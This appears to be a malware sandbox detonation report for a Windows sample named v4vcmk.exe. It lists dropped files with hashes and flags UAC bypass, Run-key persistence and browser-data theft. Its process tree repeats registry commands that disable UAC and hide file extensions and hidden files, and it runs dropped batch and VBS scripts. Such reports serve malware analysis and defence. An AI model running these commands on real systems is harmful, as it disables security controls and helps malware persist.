SHA512 4e73a24161114844d0e42c44c73205c4a57fa4169bd16c95fb7e9d6d5fcdf8bd01741541c77570556ac1f5ee260da67a9041f40381b6c6e0601c9de385bdc024

C:\Users\Admin\AppData\Local\Temp\v4vcmk

MD5 6f90adcbf8a3254558fe0aa75e416573
SHA1 5e5baaa632e90d78297f3c5edb9c592f15c53d4d
SHA256 e69f8ed2ba8b1bf7bccd65052fb89719e1ff5178cf82b95fd302a3ae950811bb
SHA512 0d9b51f0514f7476179f7b57c231fb40aabb79c747f164852130ee35c1b8caa30a2f6d888e4530fe6e22a4098ccc04301890c1da70ef7a0b2d44d681b370564d

C:\Users\Admin\AppData\Local\Temp\file.vbs

MD5 4afb5c4527091738faf9cd4addf9d34e
SHA1 170ba9d866894c1b109b62649b1893eb90350459
SHA256 59d889a2bf392f4b117340832b4c73425a7fb1de6c2f83a1aaa779d477c7c6cc
SHA512 16d386d9ece30b459fd47ca87da1f67b38d52a8e55f8fd063762cb3b46ae2c10bc6eac7359b0d1ef4c31c1ac8748ae8f62f8816eff0691abdd3304df38e979a5

memory/3692-205-0x0000000000400000-0x000000000043D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\ZsYEsEkg.bat

MD5 bae1095f340720d965898063fede1273
SHA1 455d8a81818a7e82b1490c949b32fa7ff98d5210
SHA256 ee5e0a414167c2aca961a616274767c4295659517a814d1428248bd53c6e829a
SHA512 4e73a24161114844d0e42c44c73205c4a57fa4169bd16c95fb7e9d6d5fcdf8bd01741541c77570556ac1f5ee260da67a9041f40381b6c6e0601c9de385bdc024

C:\Users\Admin\AppData\Local\Temp\v4vcmk

MD5 6f90adcbf8a3254558fe0aa75e416573
SHA1 5e5baaa632e90d78297f3c5edb9c592f15c53d4d
SHA256 e69f8ed2ba8b1bf7bccd65052fb89719e1ff5178cf82b95fd302a3ae950811bb
SHA512 0d9b51f0514f7476179f7b57c231fb40aabb79c747f164852130ee35c1b8caa30a2f6d888e4530fe6e22a4098ccc04301890c1da70ef7a0b2d44d681b370564d

C:\Users\Admin\AppData\Local\Temp\file.vbs

MD5 4afb5c4527091738faf9cd4addf9d34e
SHA1 170ba9d866894c1b109b62649b1893eb90350459
SHA256 59d889a2bf392f4b117340832b4c73425a7fb1de6c2f83a1aaa779d477c7c6cc
SHA512 16d386d9ece30b459fd47ca87da1f67b38d52a8e55f8fd063762cb3b46ae2c10bc6eac7359b0d1ef4c31c1ac8748ae8f62f8816eff0691abdd3304df38e979a5

C:\Users\Admin\fSgEsIQI\dAkcYIYg.inf

MD5 f68e57e52dfdc91de4a3ccf12d8e9a93
SHA1 eb75d4c2f6df58f86494c80e641eecc1a9af459e
SHA256 931db786e141419331c5f5a49e9a07a741c5054ea1ad78d6e12bc45d6b1757c3
SHA512 dc38bbdad8d23b9749185df17d8e15e2018bbb2296a64acaf06cc008c9970368fcfd6f02e00fb998bb77e0372c40382aec23cb8984f850ae4759398aaa1c1a6e

memory/4856-210-0x0000000000400000-0x000000000043D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\NqcYUAQk.bat

MD5 bae1095f340720d965898063fede1273
SHA1 455d8a81818a7e82b1490c949b32fa7ff98d5210
SHA256 ee5e0a414167c2aca961a616274767c4295659517a814d1428248bd53c6e829a
SHA512 4e73a24161114844d0e42c44c73205c4a57fa4169bd16c95fb7e9d6d5fcdf8bd01741541c77570556ac1f5ee260da67a9041f40381b6c6e0601c9de385bdc024

C:\Users\Admin\AppData\Local\Temp\v4vcmk

MD5 6f90adcbf8a3254558fe0aa75e416573
SHA1 5e5baaa632e90d78297f3c5edb9c592f15c53d4d
SHA256 e69f8ed2ba8b1bf7bccd65052fb89719e1ff5178cf82b95fd302a3ae950811bb
SHA512 0d9b51f0514f7476179f7b57c231fb40aabb79c747f164852130ee35c1b8caa30a2f6d888e4530fe6e22a4098ccc04301890c1da70ef7a0b2d44d681b370564d

memory/4320-213-0x0000000000400000-0x000000000043D000-memory.dmp

memory/2400-214-0x0000000000400000-0x000000000043D000-memory.dmp

memory/748-215-0x0000000000400000-0x000000000043D000-memory.dmp

memory/5060-216-0x0000000000400000-0x000000000043D000-memory.dmp

memory/3880-217-0x0000000000400000-0x000000000043D000-memory.dmp

memory/4008-218-0x0000000000400000-0x000000000043D000-memory.dmp

memory/3396-219-0x0000000000400000-0x000000000043D000-memory.dmp

memory/4804-220-0x0000000000400000-0x000000000043D000-memory.dmp

memory/2564-221-0x0000000000400000-0x000000000043D000-memory.dmp

memory/5104-222-0x0000000000400000-0x000000000043D000-memory.dmp

memory/3692-223-0x0000000000400000-0x000000000043D000-memory.dmp

memory/3508-224-0x0000000000400000-0x000000000043D000-memory.dmp

memory/4216-225-0x0000000000400000-0x000000000043D000-memory.dmp

memory/4124-226-0x0000000000400000-0x000000000043D000-memory.dmp

memory/1976-227-0x0000000000400000-0x000000000043D000-memory.dmp

memory/4524-228-0x0000000000400000-0x000000000043D000-memory.dmp

memory/3788-229-0x0000000000400000-0x000000000043D000-memory.dmp

memory/5008-230-0x0000000000400000-0x000000000043D000-memory.dmp

memory/4124-231-0x0000000000400000-0x000000000043D000-memory.dmp

memory/4552-232-0x0000000000400000-0x000000000043D000-memory.dmp

memory/4576-233-0x0000000000400000-0x000000000043D000-memory.dmp

memory/3400-234-0x0000000000400000-0x000000000043D000-memory.dmp

memory/4228-235-0x0000000000400000-0x000000000043D000-memory.dmp

memory/4000-236-0x0000000000400000-0x000000000043D000-memory.dmp

memory/4676-237-0x0000000000400000-0x000000000043D000-memory.dmp

memory/3760-238-0x0000000000400000-0x000000000043D000-memory.dmp

memory/5056-239-0x0000000000400000-0x000000000043D000-memory.dmp

memory/3548-240-0x0000000000400000-0x000000000043D000-memory.dmp

memory/1868-241-0x0000000000400000-0x000000000043D000-memory.dmp

memory/4216-244-0x0000000000400000-0x000000000043D000-memory.dmp

memory/4608-243-0x000002C39CA80000-0x000002C39CA90000-memory.dmp

memory/4608-242-0x000002C39CA20000-0x000002C39CA30000-memory.dmp

memory/4784-245-0x0000000000400000-0x000000000043D000-memory.dmp

memory/4608-246-0x000002C39F140000-0x000002C39F144000-memory.dmp

memory/3608-247-0x0000000000400000-0x000000000043D000-memory.dmp

memory/296-248-0x0000000000400000-0x000000000043D000-memory.dmp

memory/4500-249-0x0000000000400000-0x000000000043D000-memory.dmp

memory/4784-250-0x0000000000400000-0x000000000043D000-memory.dmp

memory/2020-251-0x0000000000400000-0x000000000043D000-memory.dmp

memory/3560-252-0x0000000000400000-0x000000000043D000-memory.dmp

memory/4356-253-0x0000000000400000-0x000000000043D000-memory.dmp

memory/2680-254-0x0000000000400000-0x000000000043D000-memory.dmp

memory/752-255-0x0000000000400000-0x000000000043D000-memory.dmp

memory/600-256-0x0000000000400000-0x000000000043D000-memory.dmp

memory/4720-257-0x0000000000400000-0x000000000043D000-memory.dmp

memory/4764-258-0x0000000000400000-0x000000000043D000-memory.dmp

memory/2188-259-0x0000000000400000-0x000000000043D000-memory.dmp

memory/2500-260-0x0000000000400000-0x000000000043D000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2022-02-10 06:54

Reported

2022-02-10 06:57

Platform

win7-en-20211208

Max time kernel

155s

Max time network

121s

Command Line

"C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe"

Signatures

Modifies visibility of file extensions in Explorer

evasion

UAC bypass

evasion trojan

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\hYgwkYwM\QgAscQoI.exe N/A
N/A N/A C:\ProgramData\DmwYMgQc\PKsMQUYQ.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Control Panel\International\Geo\Nation C:\Users\Admin\hYgwkYwM\QgAscQoI.exe N/A

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\PKsMQUYQ.exe = "C:\\ProgramData\\DmwYMgQc\\PKsMQUYQ.exe" C:\ProgramData\DmwYMgQc\PKsMQUYQ.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Windows\CurrentVersion\Run\TIkMIsss.exe = "C:\\Users\\Admin\\mQUgQkwg\\TIkMIsss.exe" C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\YioMwUEg.exe = "C:\\ProgramData\\xcIAYMoI\\YioMwUEg.exe" C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Windows\CurrentVersion\Run\QgAscQoI.exe = "C:\\Users\\Admin\\hYgwkYwM\\QgAscQoI.exe" C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Windows\CurrentVersion\Run\QgAscQoI.exe = "C:\\Users\\Admin\\hYgwkYwM\\QgAscQoI.exe" C:\Users\Admin\hYgwkYwM\QgAscQoI.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\PKsMQUYQ.exe = "C:\\ProgramData\\DmwYMgQc\\PKsMQUYQ.exe" C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe N/A

Enumerates physical storage devices

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\hYgwkYwM\QgAscQoI.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WerFault.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\hYgwkYwM\QgAscQoI.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1572 wrote to memory of 1124 N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe C:\Users\Admin\hYgwkYwM\QgAscQoI.exe
PID 1572 wrote to memory of 788 N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe C:\ProgramData\DmwYMgQc\PKsMQUYQ.exe
PID 1572 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe C:\Windows\SysWOW64\cmd.exe
PID 1572 wrote to memory of 668 N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe C:\Windows\SysWOW64\reg.exe
PID 1572 wrote to memory of 1428 N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe C:\Windows\SysWOW64\reg.exe
PID 1572 wrote to memory of 724 N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe C:\Windows\SysWOW64\reg.exe
PID 1572 wrote to memory of 1876 N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe C:\Windows\SysWOW64\cmd.exe
PID 1632 wrote to memory of 1400 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe
PID 1876 wrote to memory of 1524 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cscript.exe
PID 1400 wrote to memory of 1964 N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe C:\Windows\SysWOW64\cmd.exe
PID 1964 wrote to memory of 1600 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe
PID 1400 wrote to memory of 988 N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe C:\Windows\SysWOW64\reg.exe
PID 1400 wrote to memory of 1896 N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe C:\Windows\SysWOW64\reg.exe
PID 1400 wrote to memory of 1748 N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe C:\Windows\SysWOW64\reg.exe
PID 1400 wrote to memory of 1904 N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe C:\Windows\SysWOW64\cmd.exe
PID 1904 wrote to memory of 1260 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cscript.exe

Processes

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

"C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe"

C:\Users\Admin\hYgwkYwM\QgAscQoI.exe

"C:\Users\Admin\hYgwkYwM\QgAscQoI.exe"

C:\ProgramData\DmwYMgQc\PKsMQUYQ.exe

"C:\ProgramData\DmwYMgQc\PKsMQUYQ.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\AUwAQEUk.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "104731432-496247423-127209854-175099898611656931707743541461038828797-1213834784"

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\haYMAUMk.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\zyIYQEwo.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\OaMoEUAU.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\cUgkQEkM.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\OSIAwcUo.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\UsQwUQEw.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\GKkYYwYU.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\YGkcEsMs.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\yYgkEAgY.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\gKAYUcEI.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\QwgEsQgQ.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\bWYEcAMM.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\LGUUYAYo.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\JQQcwosc.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\zOwYoUMg.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

